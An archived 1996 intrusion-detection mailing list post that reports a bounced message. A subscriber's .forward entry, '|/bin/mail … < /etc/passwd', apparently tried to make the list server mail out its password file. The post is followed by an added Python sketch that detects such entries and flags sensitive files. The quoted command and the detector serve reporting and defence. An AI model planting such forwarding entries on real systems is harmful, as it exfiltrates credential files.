[660] in Intrusion Detection Systems
IDS Mailing List detects intrusion attempt ?
daemon@ATHENA.MIT.EDU (Justin J. Lister)
Mon Mar 18 05:00:22 1996
To: ids@uow.edu.au (Intrusion Detection System Mailing List)
Date: Fri, 15 Mar 1996 13:56:04 +1100 (EST)
Cc: postmaster@pollux.cs.uga.edu
From: ruf@osiris.cs.uow.edu.au (Justin J. Lister)
Reply-To: ids@uow.edu.au
G'day,
I don't know if this was a deliberate attempt to be amusing
(definitely too early for April Fools) but the owner-ids received an
interesting Returned: mail from MAILER-DAEMON@pollux.cs.uga.edu.
Could be a first 'Intrusion Detection List catches attempted intrusion'
(hey Steve do you have an intrusion penetration rule for this scenario).
The mail was in response to a subscription request to IDS (attempting to
deliver the list introduction message).
The Headers from MAILER-DAEMON:
Date: Thu, 14 Mar 1996 21:20:34 -0500 (EST)
From: Mail Delivery Subsystem <MAILER-DAEMON@pollux.cs.uga.edu>
Subject: Returned mail: /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files
To: <owner-ids@uow.edu.au>
The original message was received at Thu, 14 Mar 1996 21:20:30 -0500 (EST)
from wyrm.its.uow.edu.au [130.130.68.1]
----- The following addresses have delivery notifications -----
|/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd (unrecoverable error)
(expanded from: <lodwick@pollux.cs.uga.edu>)
----- Transcript of session follows -----
553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
/etc/passwd... Unbalanced '<'
550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
/etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma
iling to files
--
+---------------------+--------------------------------------------------+
| ____ ___ | Justin Lister ruf@cs.uow.edu.au |
| | \\ /\ __\ | Center for Computer Security Research |
| | |) / \_/ / |_ | Dept. Computer Science voice: 61-42-214-327|
| | _ \\ /| _/ | University of Wollongong fax: 61-42-214-329|
| |_/ \/ \_/ |_| (tm) | LiNuX- iNTEL justification. mobile: 61-0411405217|
| | Computer Security a utopian dream... |
+---------------------+--------------------------------------------------+
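
A sketch of the kind of rule the message asks about, as an added example that is not part of the original post: it scans sendmail bounce transcript lines for .forward entries that deliver to a program, and tags those that use shell redirection or name a sensitive file. The function name, the SENSITIVE list and the third sample line are assumptions made for illustration.

```python
import re

# Sendmail bounce transcript lines of the form:
#   <code> <path>/.forward: line <n>: <entry>... <reason>
FORWARD_RE = re.compile(
    r"^(?P<code>\d{3}) (?P<file>\S*/\.forward): line (?P<line>\d+): "
    r"(?P<entry>.+?)\.\.\. (?P<reason>.+)$"
)
# Files whose appearance in a piped .forward entry warrants review
# (assumed list, extend for the local site).
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/group")


def flag_forward_entries(lines):
    """Return one finding per .forward entry that pipes mail to a program."""
    findings = []
    for raw in lines:
        m = FORWARD_RE.match(raw.strip())
        if not m:
            continue
        entry = m.group("entry")
        if not entry.startswith("|"):
            continue  # plain address forwarding, not program delivery
        tags = ["pipe-to-program"]
        if re.search(r"[<>]", entry):
            tags.append("shell-redirection")
        tags += ["reads:" + p for p in SENSITIVE if p in entry]
        findings.append({"file": m.group("file"), "line": int(m.group("line")),
                         "code": m.group("code"), "entry": entry, "tags": tags})
    return findings


# The two transcript lines from the bounce above, re-joined where the mail
# wrapped them, plus one constructed benign line for contrast.
SAMPLE = [
    "553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... Unbalanced '<'",
    "550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files",
    "550 /home/example/.forward: line 1: someone@example.org... User unknown",  # constructed
]

if __name__ == "__main__":
    for f in flag_forward_entries(SAMPLE):
        print(f["code"], f["file"], f["tags"])
```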